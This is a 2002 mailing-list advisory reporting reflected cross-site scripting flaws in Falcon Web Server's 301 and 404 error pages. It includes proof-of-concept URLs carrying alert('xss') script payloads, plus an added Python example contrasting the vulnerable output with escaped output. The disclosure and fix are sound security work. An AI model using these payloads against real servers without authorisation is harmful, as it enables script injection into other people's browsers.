Cross-Site Scripting Issues in Falcon Web Server

From: Matthew Murphy (mattmurphy@kc.rr.com)
Date: 08/09/02


From: "Matthew Murphy" <mattmurphy@kc.rr.com>
To: "BugTraq" <bugtraq@securityfocus.com>, "Full Disclosure" <full-disclosure@lists.netsys.com>, "SecurITeam News" <news@securiteam.com>, "Vuln-Dev" <vuln-dev@securityfocus.com>
Date: Thu, 8 Aug 2002 18:31:20 -0500

From Developer:

"Falcon Web Server is running under Windows NT/2000/XP as well as Windows
95/98. It supports ISAPI and WinCGI, and it is a fully functional web
server which is capable of running a small / medium scale website of about
50-80 hits per minute. The real advantage of Falcon Web Server is the
ability to run on a desktop computer with almost the same functionality as
large-scale web servers like MS IIS and Apache."

A lack of input sanitization in the error message output of this server makes
it susceptible to two cross-site scripting vulnerabilities:

* An issue in the way the server handles 301 messages when a file is not
found, and the request is not terminated by a slash. Falcon simply adds a
slash to the request URI, and sends back a 301 with the following entity:

<html><head><title>/<SCRIPT>alert("xss")</SCRIPT>/</title></head><body>Redirecting browser to <a href="/<SCRIPT>alert("xss")</SCRIPT>/">/<SCRIPT>alert("xss")</SCRIPT>/</a><br>If nothing happens click the link above.</body></html>

* An issue in the way the server handles 404 messages when a file/folder is
not found, and the necessary slash has been added (entity below):

<html><head><title>HTTP/1.0 404 Not Found</title></head><body><h1>/<SCRIPT>alert("xss")</SCRIPT>/index.html Not Found</h1><p>Cannot locate the requested file.</body></html>

Examples:

* 301 Message XSS

Closing TITLE tag:
http://localhost/%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
Closing A HREF:
http://localhost/%22%3cscript%3ealert(%22xss%22)%3c/script%3e
Closing A tag:
http://localhost/%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

* 404 Message XSS

http://localhost/%3cscript%3ealert(%22xss%22)%3c/script%3e/

The 301 examples will simply have a slash appended and be passed back to the
browser, which follows the redirect and receives a 404, exploiting that
vulnerability as well (although the 301 payloads will cause some useless HTML
to be added on).
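The following is an added example, not Falcon's code or part of the original
post: it reconstructs the two error entities quoted above from the
percent-decoded request path (the `*_vulnerable` functions), and beside them
shows the same entities with the path encoded for each HTML context it lands
in (the `*_fixed` functions). The probe paths are the advisory's URLs after
percent-decoding; the `PROBES` dictionary, the function names and the
`payload_survives` check are assumptions made for illustration.

```python
import html
from urllib.parse import quote

# Constructed inputs (not taken from any server traffic): the request paths a
# server would see after percent-decoding the advisory's probe URLs, plus a
# benign path to show that normal behaviour is preserved by the fix.
PROBES = {
    "benign": "/docs/readme",
    "close_title": '/</title><script>alert("xss")</script>',
    "close_href": '/"<script>alert("xss")</script>',
    "close_a": '/</a><script>alert("xss")</script>',
    "404_path": '/<script>alert("xss")</script>/',
}


def redirect_entity_vulnerable(path):
    """Mimics the 301 entity quoted in the advisory: the request path, with a
    slash appended, is copied raw into <title>, the href attribute and the
    link text, so any markup in the path is rendered by the browser."""
    target = path + "/"
    return (f"<html><head><title>{target}</title></head><body>"
            f'Redirecting browser to <a href="{target}">{target}</a><br>'
            "If nothing happens click the link above.</body></html>")


def not_found_entity_vulnerable(path):
    """Mimics the 404 entity: path plus 'index.html' copied raw into <h1>."""
    target = path.rstrip("/") + "/index.html"
    return ("<html><head><title>HTTP/1.0 404 Not Found</title></head><body>"
            f"<h1>{target} Not Found</h1><p>Cannot locate the requested file."
            "</body></html>")


def redirect_entity_fixed(path):
    """Same entity, with the path encoded per context: html.escape for text
    nodes, percent-encoding (then html.escape) for the href attribute. The
    browser now sees the path as data, never as markup."""
    target = path + "/"
    as_text = html.escape(target, quote=True)
    as_href = html.escape(quote(target, safe="/"), quote=True)
    return (f"<html><head><title>{as_text}</title></head><body>"
            f'Redirecting browser to <a href="{as_href}">{as_text}</a><br>'
            "If nothing happens click the link above.</body></html>")


def not_found_entity_fixed(path):
    """404 entity with the path HTML-escaped before it enters the <h1>."""
    target = html.escape(path.rstrip("/") + "/index.html", quote=True)
    return ("<html><head><title>HTTP/1.0 404 Not Found</title></head><body>"
            f"<h1>{target} Not Found</h1><p>Cannot locate the requested file."
            "</body></html>")


def payload_survives(entity):
    """True if a literal <script> tag reached the response body unencoded:
    the check a scanner would apply to the server's reply."""
    return "<script>" in entity.lower()


def audit():
    """Run every probe through both generators. Returns {probe: (vuln, fixed)}
    where each flag says whether the payload survived in either entity."""
    results = {}
    for name, path in PROBES.items():
        vuln = (payload_survives(redirect_entity_vulnerable(path)) or
                payload_survives(not_found_entity_vulnerable(path)))
        fixed = (payload_survives(redirect_entity_fixed(path)) or
                 payload_survives(not_found_entity_fixed(path)))
        results[name] = (vuln, fixed)
    return results


if __name__ == "__main__":
    for name, (vuln, fixed) in audit().items():
        print(f"{name:12s} vulnerable={vuln!s:5s} fixed={fixed}")
```

The `close_href` probe is the one to watch: escaping only `<` and `>` would
still let `"` close the attribute, which is why the href is percent-encoded
(so `"` becomes `%22`) and the text contexts use `html.escape(..., quote=True)`.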

"The reason the mainstream is thought
of as a stream is because it is
so shallow."
                     - Author Unknown


